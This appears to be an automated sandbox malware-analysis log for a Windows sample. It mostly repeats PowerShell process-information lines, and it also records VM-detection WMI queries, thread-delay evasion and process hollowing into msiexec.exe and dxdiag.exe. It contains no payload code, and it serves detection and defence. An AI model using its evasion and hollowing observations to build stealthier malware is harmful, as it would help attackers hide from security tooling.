Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5446Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4249Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\SIHClient.exe TID: 6416Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: SIHClient.exe, 00000004.00000003.2214265564.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2599488097.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2592563659.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212344595.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2214561565.0000017F02A3B000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2213664258.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212310953.0000017F02A3A000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2598946265.0000017F02A35000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2600438470.0000017F02A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeAPI call chain: ExitProcess graph end nodegraph_0-3535
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
